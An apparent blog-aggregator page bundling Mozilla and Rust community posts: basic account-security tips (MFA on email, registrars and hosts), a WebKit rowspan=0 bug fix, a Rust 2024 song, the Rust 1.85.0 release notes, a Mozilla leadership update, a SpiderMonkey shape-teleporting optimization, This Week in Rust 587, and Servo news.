Tantek Çelik – CSF_01: Three Steps for IndieWeb Cybersecurity

Welcome to my first Cybersecurity Friday (CSF) post. Almost exactly one week ago I experienced (and had to fight & recover from) a cybersecurity incident. While that’s a much longer story, this post series is focused on sharing tips and incident learnings from an #indieweb-centric perspective.

Steps for Cybersecurity

Here are the top three steps, in order of importance, that you should take ASAP to secure your online presence.

  1. Email MFA/2FA. Add multi-factor authentication (MFA) using an actual Authenticator application to all places where you store or check email. Some services call this a second factor or two-factor authentication (2FA). While checking your email security settings, verify your recovery settings: do not cross-link your email accounts as recovery methods for each other, and do not use a mobile/cell number for recovery at all.
  2. Domain Registrar MFA. Add MFA to your Domain Registrar(s) if you have any. Optionally disable password reset emails if possible (some registrars may allow this).
  3. Web Host MFA. Add MFA to your web hosting service(s) if you have any. This includes both website hosting and any content delivery network (CDN) services you are using for your domains.

Do not use a mobile number for MFA, nor a physical/hardware key if you travel internationally. There are very good reasons to avoid doing so. I’ll blog the reasons in another post.

Those are my top three recommended cybersecurity steps for protecting your internet presence. That’s it for this week. These are the bare minimum steps to take. There are many more steps you can take to strengthen your personal cybersecurity. I will leave you with this for now:

Entropy is your friend in security.
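That line can be made concrete with a little arithmetic: a randomly generated password drawn uniformly from an alphabet carries about length × log2(alphabet size) bits of entropy. A minimal sketch in Rust (the function name and numbers are mine, purely illustrative, and the formula only applies to randomly generated secrets):

```rust
// Illustrative only: entropy estimate for a *randomly generated* password.
// Human-chosen passwords have far less entropy than this formula suggests.
fn password_entropy_bits(length: u32, alphabet_size: u32) -> f64 {
    length as f64 * (alphabet_size as f64).log2()
}

fn main() {
    // 16 random characters over the 94 printable ASCII characters:
    println!("{:.1} bits", password_entropy_bits(16, 94)); // about 104.9 bits
}
```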

Glossary

Glossary for various terms, phrases, and further reading on each.

content delivery network
https://indieweb.org/content_delivery_network
cybersecurity
https://en.wikipedia.org/wiki/cybersecurity
domain registrar
https://indieweb.org/domain_registrar
email recovery
A method for recovering a service account password via the email account associated with that account. See also: https://en.wikipedia.org/wiki/Password_notification_email
entropy
https://en.wikipedia.org/wiki/Entropy_(information_theory)
MFA / 2FA
https://indieweb.org/multi-factor_authentication sometimes called Two Factor Authentication or Second Factor Authentication
mobile number for MFA
https://indieweb.org/SMS#Criticism
web host
https://indieweb.org/web_hosting

Syndicated to: IndieNews

Karl Dubost – Fixing rowspan=0 on tables on WebKit.

stacked tables and chairs in the street.

Last week, I mentioned there were easy ways to fix or help the WebKit project.

Find The Bug

In January, looking at the FIXME: mentions on the WebKit project, I found this piece of code:

unsigned HTMLTableCellElement::rowSpan() const
{
    // FIXME: a rowSpan equal to 0 should be allowed, and mean that the cell is to span all the remaining rows in the row group.
    return std::max(1u, rowSpanForBindings());
}

Searching on bugs.webkit.org, I found this bug opened by Simon Fraser on May 5, 2018: rowspan="0" results in different table layout than Firefox/Chrome. Would I be able to solve it?

Test The Bug

The first task is very simple: understand how the renderings differ between browsers.

Simon had already created a testcase, and Ahmad had created a screenshot showing the results of the testcase in Safari, Firefox and Chrome. This work was already done. If it had been missing, creating it would have been my first step.

Read The Specification

To better understand the issue, it is useful to read the specification related to the bug. In this case, the relevant information is in the HTML specification, where the rowspan attribute on td/th elements is described. This is the text we need:

The td and th elements may also have a rowspan content attribute specified, whose value must be a valid non-negative integer less than or equal to 65534. For this attribute, the value zero means that the cell is to span all the remaining rows in the row group.

Create More Tests

Let's take a normal simple table which is 3 by 3.

<table border="1">
  <tr><td>A1</td><td>B1</td><td>C1</td></tr>
  <tr><td>A2</td><td>B2</td><td>C2</td></tr>
  <tr><td>A3</td><td>B3</td><td>C3</td></tr>
</table>

We might want to make the first cell overlapping the 3 rows of the tables. A way to do that is to set rowspan="3" because there are 3 rows.

<table border="1">
  <tr><td rowspan="3">A1</td><td>B1</td><td>C1</td></tr>
  <tr>                       <td>B2</td><td>C2</td></tr>
  <tr>                       <td>B3</td><td>C3</td></tr>
</table>

This creates a table where the first cell spans the 3 rows. This already works as expected in all rendering engines: WebKit, Gecko and Blink. So far, so good.

Think About The Logic

I learned from reading the specification that rowspan had a maximum value: 65534.

My initial train of thought was:

  1. compute the number of rows in the table,
  2. parse the rowspan value,
  3. when the value is 0, replace it with the number of rows.

It seemed too convoluted. Would it be possible to use the maximum value for rowspan instead? The specification said to "span all the remaining rows in the row group".

I experimented with a rowspan value bigger than the number of rows, for example the value 30 on a 3-row table.

<table border="1">
  <tr><td rowspan="30">A1</td><td>B1</td><td>C1</td></tr>
  <tr>                        <td>B2</td><td>C2</td></tr>
  <tr>                        <td>B3</td><td>C3</td></tr>
</table>

I checked in Firefox, Chrome, and Safari. I got the same rendering. We were on the right track. Let's use the maximum value for rowspan.

I made a test case with additional examples so I could check the behavior in different browsers:

Rendering of the table bug in Safari.

Fixing The Code

We just had to change the C++ code. My patch was:

diff --git a/Source/WebCore/html/HTMLTableCellElement.cpp b/Source/WebCore/html/HTMLTableCellElement.cpp
index 256c816acc37b..65450c01e369a 100644
--- a/Source/WebCore/html/HTMLTableCellElement.cpp
+++ b/Source/WebCore/html/HTMLTableCellElement.cpp
@@ -59,8 +59,14 @@ unsigned HTMLTableCellElement::colSpan() const

 unsigned HTMLTableCellElement::rowSpan() const
 {
-    // FIXME: a rowSpan equal to 0 should be allowed, and mean that the cell is to span all the remaining rows in the row group.
-    return std::max(1u, rowSpanForBindings());
+    unsigned rowSpanValue = rowSpanForBindings();
+    // when rowspan=0, the HTML spec says it should apply to the full remaining rows.
+    // In https://html.spec.whatwg.org/multipage/tables.html#attr-tdth-rowspan
+    // > For this attribute, the value zero means that the cell is
+    // > to span all the remaining rows in the row group.
+    if (!rowSpanValue)
+        return maxRowspan;
+    return std::max(1u, rowSpanValue);
 }

 unsigned HTMLTableCellElement::rowSpanForBindings() const

If rowspan is 0, we just return the maximum value, which is defined in HTMLTableCellElement.h.
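The rule itself is tiny; here is the same logic sketched in Rust rather than C++ (the names are mine, and the constant is the spec's 65534 limit):

```rust
// Sketch of the fixed rowSpan() logic, assuming the spec maximum of 65534.
const MAX_ROWSPAN: u32 = 65534;

fn effective_row_span(parsed_rowspan: u32) -> u32 {
    if parsed_rowspan == 0 {
        // rowspan="0" means "span all the remaining rows in the row group";
        // returning the maximum produces the same rendering.
        MAX_ROWSPAN
    } else {
        // Mirrors the original std::max(1u, rowSpanForBindings()).
        parsed_rowspan.max(1)
    }
}

fn main() {
    assert_eq!(effective_row_span(0), 65534);
    assert_eq!(effective_row_span(3), 3);
    assert_eq!(effective_row_span(30), 30);
}
```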

I compiled the code change and verified the results:

Rendering of the table bug in Safari but this time fixed.

(note for the careful reader the last table legend is wrong, it should be rowspan="3")

This was fixed! A couple of tests needed to be rebaselined. I was ready to send a Pull Request for this bug.

What Is Next?

The fix is not yet available in the current version of Safari, but you can experiment with it in Safari Technology Preview (STP 213 Release Notes).

The biggest part of fixing a bug like this is research: testing different HTML scenarios without even touching the C++ code. I'm not a C++ programmer, but from time to time I find bugs that are easy enough to understand that I can fix them. I hope this makes the process easier to understand and encourages you to look at other bugs.

Note also that it is not always necessary to go all the way to modifying the code. Sometimes just creating testcases and screenshots, pointing to the right places in the specifications, or creating WPT test cases covering the bug is already super useful.

PS: While doing all this work, I also found out about the behavior of colspan, which is interoperable (same behavior in all browsers) but which I find illogical compared to the behavior of rowspan.

Otsukare!

Niko Matsakis – Rust 2024 Is Coming

So, a little bird told me that Rust 2024 is going to become stable today, along with Rust 1.85.0. In honor of this momentous event, I have penned a little ditty that I’d like to share with you all. Unfortunately, for those of you who remember Rust 2021’s “Edition: The song”, in the 3 years between Rust 2021 and now, my daughter has realized that her father is deeply uncool¹ and so I had to take this one on solo². Anyway, enjoy! Or, you know, suffer. As the case may be.

Video

Watch the movie embedded here, or watch it on YouTube:

Lyrics

In ChordPro format, for those of you who are inspired to play along.

{title: Rust 2024}
{subtitle: }

{key: C}

[Verse 1]
[C] When I got functions that never return
I write an exclamation point [G]
But use it for an error that could never be
the compiler [C] will yell at me

[Verse 2]
[C] We Rust designers, we want that too
[C7] But we had to make a [F] change
[F] That will be [Fm]better
[C] Oh so much [A]better
[D] in Rust Twenty [G7]Twenty [C]Four

[Bridge]
[Am] ... [Am] But will my program [E] build?
[Am] Yes ... oh that’s [D7] for sure
[F] edi-tions [G] are [C] opt in

[Verse 3]
[C] Usually when I return an `impl Trait`
everything works out fine [G]
but sometimes I need a tick underscore
and I don’t really [C] know what that’s for

[Verse 4]
[C] We Rust designers we do agree
[C7] That was con- [F] fusing 
[F] But that will be [Fm]better
[C] Oh so much [A]better
[D] in Rust Twenty [G7]Twenty [C]Four

[Bridge 2]
[Am] Cargo fix will make the changes
automatically [G] Oh that sure sounds great...
[Am] but wait... [Am] my de-pen-denc-[E]-ies
[Am] Don’t worry e-[D7]ditions
[F] inter [G] oper [C] ate

[Verse 5]
[C] Whenever I match on an ampersand T
The borrow [G] propagates
But where do I put the ampersand
when I want to [C] copy again?

[Verse 6]
[C] We Rust designers, we do agree
[C7] That really had to [F] change
[F] That will be [Fm]better
[C] Oh so much [A]better
[D] in Rust Twenty [G7]Twenty [C]Four

[Outro]
[F] That will be [Fm]better
[C] Oh so much [A]better
[D] in Rust Twenty [G7]Twenty [C]Four

One more time!

[Half speed]
[F] That will be [Fm]better
[C] Oh so much [A]better
[D] in Rust Twenty [G7]Twenty [C]Four

  1. It was bound to happen eventually. ↩︎

  2. Actually, I had a plan to make this a duet with somebody who shall remain nameless (they know who they are). But I was too lame to get everything done on time. In fact, I may or may not have realized “Oh, shit, I need to finish this recording!” while in the midst of a beer with Florian Gilcher last night. Anyway, sorry, would-be-collaborator-I-was-really-looking-forward-to-playing-with! Next time! ↩︎

The Rust Programming Language Blog – Announcing Rust 1.85.0 and Rust 2024

The Rust team is happy to announce a new version of Rust, 1.85.0. This stabilizes the 2024 edition as well. Rust is a programming language empowering everyone to build reliable and efficient software.

If you have a previous version of Rust installed via rustup, you can get 1.85.0 with:

$ rustup update stable

If you don't have it already, you can get rustup from the appropriate page on our website, and check out the detailed release notes for 1.85.0.

If you'd like to help us out by testing future releases, you might consider updating locally to use the beta channel (rustup default beta) or the nightly channel (rustup default nightly). Please report any bugs you might come across!

What's in 1.85.0 stable

Rust 2024

We are excited to announce that the Rust 2024 Edition is now stable! Editions are a mechanism for opt-in changes that may otherwise pose a backwards compatibility risk. See the edition guide for details on how this is achieved, and detailed instructions on how to migrate.

This is the largest edition we have released. The edition guide contains detailed information about each change, but as a summary, here are all the changes:

Migrating to 2024

The guide includes migration instructions for all new features, and in general transitioning an existing project to a new edition. In many cases cargo fix can automate the necessary changes. You may even find that no changes in your code are needed at all for 2024!

Note that automatic fixes via cargo fix are very conservative to avoid ever changing the semantics of your code. In many cases you may wish to keep your code the same and use the new semantics of Rust 2024; for instance, continuing to use the expr macro matcher, and ignoring the conversions of conditionals because you want the new 2024 drop order semantics. The result of cargo fix should not be considered a recommendation, just a conservative conversion that preserves behavior.

Many people came together to create this edition. We'd like to thank them all for their hard work!

async closures

Rust now supports asynchronous closures like async || {} which return futures when called. This works like an async fn which can also capture values from the local environment, just like the difference between regular closures and functions. This also comes with 3 analogous traits in the standard library prelude: AsyncFn, AsyncFnMut, and AsyncFnOnce.

In some cases, you could already approximate this with a regular closure and an asynchronous block, like || async {}. However, the future returned by such an inner block is not able to borrow from the closure captures, but this does work with async closures:

use std::future::ready;

let mut vec: Vec<String> = vec![];

let closure = async || {
    vec.push(ready(String::from("")).await);
};

It also has not been possible to properly express higher-ranked function signatures with the Fn traits returning a Future, but you can write this with the AsyncFn traits:

use core::future::Future;
async fn f<Fut>(_: impl for<'a> Fn(&'a u8) -> Fut)
where
    Fut: Future<Output = ()>,
{ todo!() }

async fn f2(_: impl for<'a> AsyncFn(&'a u8))
{ todo!() }

async fn main() {
    async fn g(_: &u8) { todo!() }
    f(g).await;
    //~^ ERROR mismatched types
    //~| ERROR one type is more general than the other

    f2(g).await; // ok!
}

So async closures provide first-class solutions to both of these problems! See RFC 3668 and the stabilization report for more details.
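To see the capture-borrowing point in action, here is a self-contained sketch (the hand-rolled block_on executor is my own toy, not a std API; the async closure syntax requires Rust 1.85+):

```rust
use std::future::Future;
use std::pin::pin;
use std::sync::Arc;
use std::task::{Context, Poll, Wake, Waker};

// Minimal executor: busy-polls a single future to completion.
struct NoopWaker;
impl Wake for NoopWaker {
    fn wake(self: Arc<Self>) {}
}

fn block_on<F: Future>(fut: F) -> F::Output {
    let waker = Waker::from(Arc::new(NoopWaker));
    let mut cx = Context::from_waker(&waker);
    let mut fut = pin!(fut);
    loop {
        if let Poll::Ready(out) = fut.as_mut().poll(&mut cx) {
            return out;
        }
    }
}

fn main() {
    let mut log: Vec<String> = Vec::new();
    // The futures returned by this async closure borrow `log` from the
    // closure's captures, which `|| async { ... }` could not express.
    let mut push = async |s: &str| log.push(format!("got {s}"));
    block_on(push("a"));
    block_on(push("b"));
    drop(push); // release the mutable borrow of `log`
    assert_eq!(log, ["got a", "got b"]);
}
```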

Hiding trait implementations from diagnostics

The new #[diagnostic::do_not_recommend] attribute is a hint to the compiler to not show the annotated trait implementation as part of a diagnostic message. For library authors, this is a way to keep the compiler from making suggestions that may be unhelpful or misleading. For example:

pub trait Foo {}
pub trait Bar {}

impl<T: Foo> Bar for T {}

struct MyType;

fn main() {
    let _object: &dyn Bar = &MyType;
}
error[E0277]: the trait bound `MyType: Bar` is not satisfied
 --> src/main.rs:9:29
  |
9 |     let _object: &dyn Bar = &MyType;
  |                             ^^^^ the trait `Foo` is not implemented for `MyType`
  |
note: required for `MyType` to implement `Bar`
 --> src/main.rs:4:14
  |
4 | impl<T: Foo> Bar for T {}
  |         ---  ^^^     ^
  |         |
  |         unsatisfied trait bound introduced here
  = note: required for the cast from `&MyType` to `&dyn Bar`

For some APIs, it might make good sense for you to implement Foo, and get Bar indirectly by that blanket implementation. For others, it might be expected that most users should implement Bar directly, so the Foo suggestion is a red herring. In that case, adding the diagnostic hint will change the error message like so:

#[diagnostic::do_not_recommend]
impl<T: Foo> Bar for T {}
error[E0277]: the trait bound `MyType: Bar` is not satisfied
  --> src/main.rs:10:29
   |
10 |     let _object: &dyn Bar = &MyType;
   |                             ^^^^ the trait `Bar` is not implemented for `MyType`
   |
   = note: required for the cast from `&MyType` to `&dyn Bar`

See RFC 2397 for the original motivation, and the current reference for more details.

FromIterator and Extend for tuples

Earlier versions of Rust implemented convenience traits for iterators of (T, U) tuple pairs to behave like Iterator::unzip, with Extend in 1.56 and FromIterator in 1.79. These have now been extended to more tuple lengths, from singleton (T,) through to 12 items long, (T1, T2, .., T11, T12). For example, you can now use collect() to fan out into multiple collections at once:

use std::collections::{LinkedList, VecDeque};
fn main() {
    let (squares, cubes, tesseracts): (Vec<_>, VecDeque<_>, LinkedList<_>) =
        (0i32..10).map(|i| (i * i, i.pow(3), i.pow(4))).collect();
    println!("{squares:?}");
    println!("{cubes:?}");
    println!("{tesseracts:?}");
}
[0, 1, 4, 9, 16, 25, 36, 49, 64, 81]
[0, 1, 8, 27, 64, 125, 216, 343, 512, 729]
[0, 1, 16, 81, 256, 625, 1296, 2401, 4096, 6561]
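Extend works in the same direction: a tuple of collections can be extended from an iterator of tuples in one pass. A small sketch (the split_pairs helper is hypothetical, not from the release notes):

```rust
// Hypothetical helper: one pass over an iterator of pairs, routing each
// element to the matching collection via the tuple Extend impl.
fn split_pairs(n: i32) -> (Vec<i32>, Vec<i32>) {
    let mut out: (Vec<i32>, Vec<i32>) = (Vec::new(), Vec::new());
    out.extend((0..n).map(|i| (i, i * i)));
    out
}

fn main() {
    let (ids, squares) = split_pairs(5);
    println!("{ids:?}");     // [0, 1, 2, 3, 4]
    println!("{squares:?}"); // [0, 1, 4, 9, 16]
}
```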

Updates to std::env::home_dir()

std::env::home_dir() has been deprecated for years, because it can give surprising results in some Windows configurations if the HOME environment variable is set (which is not the normal configuration on Windows). We had previously avoided changing its behavior, out of concern for compatibility with code depending on this non-standard configuration. Given how long this function has been deprecated, we're now updating its behavior as a bug fix, and a subsequent release will remove the deprecation for this function.

Stabilized APIs

These APIs are now stable in const contexts

Other changes

Check out everything that changed in Rust, Cargo, and Clippy.

Contributors to 1.85.0

Many people came together to create Rust 1.85.0. We couldn't have done it without all of you. Thanks!

The Mozilla Blog – Growing Mozilla — and evolving our leadership

Since 2022, Mozilla has been in an active process of evolving what we do and renewing our leadership. Today we announced several updates on the leadership piece of this ongoing work.

We’ve recognized that Mozilla faces major headwinds in terms of both financial growth and mission impact. While Firefox remains the core of what we do, we also need to take steps to diversify: investing in privacy-respecting advertising to grow new revenue in the near term; developing trustworthy, open source AI to ensure technical and product relevance in the mid term; and creating online fundraising campaigns that will draw a bigger circle of supporters over the long run. Mozilla’s impact and survival depend on us simultaneously strengthening Firefox AND finding new sources of revenue AND manifesting our mission in fresh ways. That is why we’re working hard on all of these fronts.

We’ve also moved aggressively to attract new leadership and talent to Mozilla. This includes major growth in our Boards, with 40% new Board members since we began our efforts to evolve and grow back in 2022. We’ve also been bringing in new executive talent, including a new MoFo Executive Director and a Managing Partner for Mozilla Ventures. By the end of the year, we hope to have new, permanent CEOs for both MoCo and Mozilla.ai. 

Today we shared two updates as we continue to push forward with this renewal at the leadership level:

1. Mozilla Leadership Council: 

We are creating a Mozilla Leadership Council composed of the top executive from each of Mozilla’s organizations. This includes: Jane Silber (Mozilla.ai), Laura Chambers (Mozilla Corporation), Mohamed Nanabhay (Mozilla Ventures), Nabiha Syed (Mozilla Foundation), Ryan Sipes (MZLA/Thunderbird) and myself. I will act as chair. The purpose of this group is to better coordinate work across our organizations to make sure that Mozilla is more than the sum of its parts. 

2. New Board Chairs: 

Mozilla has built a strong cadre of 16 directors across all of our Boards, bringing an incredible breadth of experience and a commitment to supporting Mozilla in doing the hard and important work ahead. Today we are announcing three new Board chairs: 

  • The new Mozilla Foundation Board Chair is Nicole Wong. Nicole is a respected cross-sector privacy and policy expert and innovator, with leadership roles at Google and Twitter/X, service as Deputy U.S. Chief Technology Officer and positions on multiple corporate and non-profit boards. Nicole has been on Mozilla Foundation’s Board for 8 years. 
  • Kerry Cooper will chair Mozilla Corporation. One of the world’s most respected CMO’s and consumer executives, Kerry has held C-Suite roles at Walmart.com, Rothy’s, Choose Energy and more, and now serves on boards spanning venture, startups and AI innovation. Kerry has been on Mozilla Corporation’s Board for 2 years. 
  • Raffi Krikorian will chair Mozilla.ai. Raffi is a visionary technologist, engineer and leader, who was an early engineering leader at Twitter, headed Uber’s self-driving car lab, and is now CTO at the Emerson Collective where he works at the intersection of emerging technologies and social good. He brings three decades of thoughtful design and implementation within social media and artificial intelligence to Mozilla.

Each of these leaders reflects what I believe will be Mozilla’s ‘secret sauce’ in our next chapter: a mix of experience bridging business, technology and the public interest. Note that these appointments are now reflected on our leadership page.

With these changes, Mitchell Baker ends her tenure as Chair and a member of Mozilla Foundation and Mozilla Corporation boards. In co-founding Mozilla, Mitchell built something truly unique and important — a global community and organization that showed how those with vision can shape the world and the future by building technology that puts the needs of humans and humanity first. We are extremely grateful to Mitchell for everything she has done for Mozilla and we are committed to continuing her legacy of fighting for a better future through better technology. I know these feelings are widely shared across Mozilla — we are incredibly appreciative to Mitchell for all that she has done.

As I have said many times over the last few years, Mozilla is entering a new chapter—one where we need to both defend what is good about the web and steer the technology and business models of the AI era in a better direction. I believe that we have the people—indeed, we ARE the people—to do this, and that there are millions around the world ready to help us. I am driven and excited by what lies ahead. 

Spidermonkey Development Blog – Making Teleporting Smarter

Recently I got to land a patch which touches a cool optimization, that I had to really make sure I understood deeply. As a result, I wrote a huge commit message. I’d like to expand that message a touch here and turn it into a nice blog post.

This post assumes roughly that you understand how Shapes work in the JavaScript object model, and how prototypical property lookup works in JavaScript. If you don’t understand that just yet, this blog post by Matthias Bynens is a good start.

This patch aims to mitigate a performance cliff that occurs when we have applications which shadow properties on the prototype chain or which mutate the prototype chain.

The problem is that these actions currently break a property lookup optimization called “Shape Teleportation”.

What is Shape Teleporting?

Suppose you’re looking up some property y on an object obj, which has a prototype chain with 4 elements. Suppose y isn’t stored on obj, but instead is stored on some prototype object B, in slot 1.

A diagram of shape teleporting

In order to get the value of this property, officially you have to walk from obj up to B to find the value of y. Of course, this would be inefficient, so what we do instead is attach an inline cache to make this lookup more efficient.

Now we have to guard against future mutation when creating an inline cache. A basic version of a cache for this lookup might look like:

  • Check obj still has the same shape.
  • Check obj’s prototype (D) still has the same shape.
  • Check D’s prototype (C) still has the same shape.
  • Check C’s prototype (B) still has the same shape.
  • Load slot 1 out of B.

This is less efficient than we would like, though. Imagine if, instead of 3 intermediate prototypes, there were 13 or 30. You’d have a long chain of prototype shape checks, which takes a long time!

Ideally, what you’d like is to be able to simply say:

  • Check obj still has the same shape.
  • Check B still has the same shape.
  • Load slot 1 out of B.

The problem with doing this naively is: “What if someone adds y as a property to C?” With the faster guards, you’d totally miss that value and, as a result, compute the wrong result. We don’t like wrong results.

Shape Teleporting is the existing optimization which says that so long as you actively force a change of shape on objects in the prototype chain when certain modifications occur, then you can guard in inline-caches only on the shape of the receiver object and the shape of the holder object.

By forcing each shape to be changed, inline caches which have baked in assumptions about these objects will no longer succeed, and we’ll take a slow path, potentially attaching a new IC if possible.

We must reshape in the following situations:

  • Adding a property to a prototype which shadows a property further up the prototype chain. In this circumstance, the object getting the new property will naturally reshape to account for the new property, but the old holder needs to be explicitly reshaped at this point, to avoid an inline cache jumping over the newly defined prototype.

A diagram of shape teleporting

  • Modifying the prototype of an object which exists on the prototype chain. For this case we need to invalidate the shape of the object being mutated (natural reshape due to changed prototype), as well as the shapes of all objects on the mutated object’s prototype chain. This is to invalidate all stubs which have teleported over the mutated object.

A diagram of shape teleporting

Furthermore, we must avoid an “A-B-A” problem, where an object returns to a shape prior to prototype modification: for example, even if we re-shape B, what if code deleted and then re-added y, causing B to take on its old shape? Then the IC would start working again, even though the prototype chain may have been mutated!

Prior to this patch, Watchtower watches for prototype mutation and shadowing, and marks the shapes of the prototype objects involved in these operations as InvalidatedTeleporting. This means that property accesses involving these objects can no longer rely on the shape teleporting optimization. This also avoids the A-B-A problem, as new shapes will always carry along the InvalidatedTeleporting flag.

This patch instead chooses to migrate an object’s shape to dictionary mode, or to generate a new dictionary shape if it is already in dictionary mode. Using dictionary mode shapes works because all dictionary mode shapes are unique and never recycled. This invalidates the relevant ICs as expected, while handily avoiding the A-B-A problem.
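The uniqueness argument can be made concrete with a toy model (this is my own Rust sketch, nothing like SpiderMonkey's actual C++): if shape ids are handed out once and never reused, a stale IC can never pass its guards again.

```rust
use std::sync::atomic::{AtomicU64, Ordering};

// Toy model: shape ids are monotonically increasing and never recycled,
// mirroring the uniqueness guarantee of dictionary-mode shapes.
static NEXT_SHAPE: AtomicU64 = AtomicU64::new(1);

fn fresh_shape() -> u64 {
    NEXT_SHAPE.fetch_add(1, Ordering::Relaxed)
}

struct Obj {
    shape: u64,
}

// A teleporting IC guards only the receiver and the holder, skipping the
// intermediate prototypes.
struct TeleportingIc {
    receiver_shape: u64,
    holder_shape: u64,
}

impl TeleportingIc {
    fn attach(receiver: &Obj, holder: &Obj) -> Self {
        TeleportingIc { receiver_shape: receiver.shape, holder_shape: holder.shape }
    }

    fn guards_pass(&self, receiver: &Obj, holder: &Obj) -> bool {
        receiver.shape == self.receiver_shape && holder.shape == self.holder_shape
    }
}

fn main() {
    let obj = Obj { shape: fresh_shape() };
    let mut holder = Obj { shape: fresh_shape() };
    let ic = TeleportingIc::attach(&obj, &holder);
    assert!(ic.guards_pass(&obj, &holder));

    // A shadowing add or prototype mutation forces a fresh shape on the
    // holder; since ids never repeat, the stale IC cannot come back to
    // life (no A-B-A problem).
    holder.shape = fresh_shape();
    assert!(!ic.guards_pass(&obj, &holder));
}
```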

The patch does keep the InvalidatedTeleporting flag to catch potentially ill-behaved sites that do lots of mutation and shadowing, avoiding having to reshape proto objects forever.

The patch also provides a preference to allow cross-comparison between old and new, however this patch defaults to dictionary mode teleportation.

Performance testing on micro-benchmarks shows a large impact from allowing ICs to attach where they couldn’t before; however, Speedometer3 shows no real movement.

This Week In Rust – This Week in Rust 587

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tag us at @ThisWeekInRust on X (formerly Twitter) or @ThisWeekinRust on mastodon.social, or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub and archives can be viewed at this-week-in-rust.org. If you find any errors in this week's issue, please submit a PR.

Want TWIR in your inbox? Subscribe here.

Updates from Rust Community

Official
Newsletters
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs
Miscellaneous

Crate of the Week

This week's crate is httpmock, which is quite unsurprisingly an HTTP mocking library for Rust.

Thanks to Jacob Pratt for the suggestion!

Please submit your suggestions and votes for next week!

Calls for Testing

An important step for RFC implementation is for people to experiment with the implementation and give feedback, especially before stabilization. The following RFCs would benefit from user testing before moving forward:

RFCs
  • No calls for testing were issued this week.
Rust
  • No calls for testing were issued this week.
Rustup
  • No calls for testing were issued this week.

If you are a feature implementer and would like your RFC to appear on the above list, add the new call-for-testing label to your RFC along with a comment providing testing instructions and/or guidance on which aspect(s) of the feature need testing.

Call for Participation; projects and speakers

CFP - Projects

Always wanted to contribute to open-source projects but did not know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here or through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

CFP - Events

Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.

If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

Updates from the Rust Project

498 pull requests were merged in the last week

Rust Compiler Performance Triage

This week's results were dominated by the update to LLVM 20 (#135763), which brought a large number of performance improvements, as usual. There were also two other significant improvements, caused by improving the representation of const values (#136593) and doing less work when formatting in rustdoc (#136828).

Triage done by @kobzol.

Revision range: c03c38d5..ce36a966

Summary:

(instructions:u)            mean   range            count
Regressions ❌ (primary)     4.4%   [0.2%, 35.8%]    10
Regressions ❌ (secondary)   1.2%   [0.2%, 5.0%]     13
Improvements ✅ (primary)   -1.6%   [-10.5%, -0.2%]  256
Improvements ✅ (secondary) -1.0%   [-4.7%, -0.2%]   163
All ❌✅ (primary)           -1.3%   [-10.5%, 35.8%]  266

3 Regressions, 2 Improvements, 4 Mixed; 4 of them in rollups. 50 artifact comparisons made in total.

Full report here.

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

Final Comment Period

Every week, the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
  • No RFCs entered Final Comment Period this week.
Tracking Issues & PRs
Rust Cargo
  • No Cargo Tracking Issues or PRs entered Final Comment Period this week.
Language Team
  • No Language Team Proposals entered Final Comment Period this week.
Language Reference
  • No Language Reference RFCs entered Final Comment Period this week.
Unsafe Code Guidelines
  • No Unsafe Code Guideline Tracking Issues or PRs entered Final Comment Period this week.
New and Updated RFCs

Upcoming Events

Rusty Events between 2025-02-19 and 2025-03-19 🦀

Virtual
Asia
Europe
North America
Oceania
South America

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Jobs

Please see the latest Who's Hiring thread on r/rust

Quote of the Week

I have found that many automated code review tools, including LLMs, catch 10 out of 3 bugs.

Josh Triplett on r/rust

Despite a lamentable lack of suggestions, llogiq is properly pleased with his choice.

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, cdmistman, ericseppanen, extrawurst, U007D, joelmarcey, mariannegoldin, bennyvasquez, bdillo

Email list hosting is sponsored by The Rust Foundation

Discuss on r/rust

The Servo BlogThis month in Servo: new webview API, relative colors, canvas buffs, and more!

Servo now supports several new web API features:

We’ve landed a bunch of HTMLCanvasElement improvements:

servoshell nightly showing relative oklch() colors, canvas toDataURL() with image/jpeg and image/webp, canvas toBlob(), the WGSLLanguageFeatures API, and the DOM tree of a custom element with a <slot>

Streams are a lot more useful now, with ReadableStreamBYOBReader now supporting read() (@Taym95, #35040), cancel(), close(), and releaseLock() (@Taym95, #34958).

Servo now passes 40.6% (+7.5pp) of enabled Shadow DOM tests, thanks to our landing support for the :host selector (@simonwuelker, #34870) and the <slot> element (@simonwuelker, #35013, #35177, #35191, #35221, #35137, #35222), plus improvements to event handling (@simonwuelker, #34788, #34884), script (@willypuzzle, #34787), style (@simonwuelker, @jdm, #35198, #35132), and the DOM tree (@simonwuelker, @Taym95, #34803, #34834, #34863, #34909, #35076).

Table layout is significantly better now, particularly in ‘table-layout: fixed’ (@Loirooriol, #35170), table sizing (@Loirooriol, @mrobinson, #34889, #34947, #35167), rowspan sizing (@mrobinson, @Loirooriol, #35095), interaction with floats (@Loirooriol, #35207), and ‘border-collapse’ layout (@Loirooriol, #34932, #34908, #35097, #35122, #35165) and painting (@Loirooriol, #34933, #35003, #35100, #35075, #35129, #35163).

As a result, Servo now passes 90.2% (+11.5pp) of enabled CSS tables tests, and of the tests that are in CSS 2, we now pass more than Blink and WebKit! We literally stood on the shoulders of giants here, because this would not have been possible without Blink’s robust table impl. Despite their age, tables are surprisingly underspecified, so we also needed to report several spec issues along the way (@Loirooriol).

Embedding

Servo aims to be an embeddable web engine, but so far it’s been a lot harder to embed Servo than it should be.

For one, configuring and starting Servo is complicated. We found that getting Servo running at all, even without wiring up input or handling resizes correctly, took over 200 lines of Rust code (@delan, @mrobinson, #35118). Embedders (apps) could only control Servo by sending and receiving a variety of “messages” and “events”, and simple questions like “what’s the current URL?” were impossible to answer without keeping track of extra state in the app.

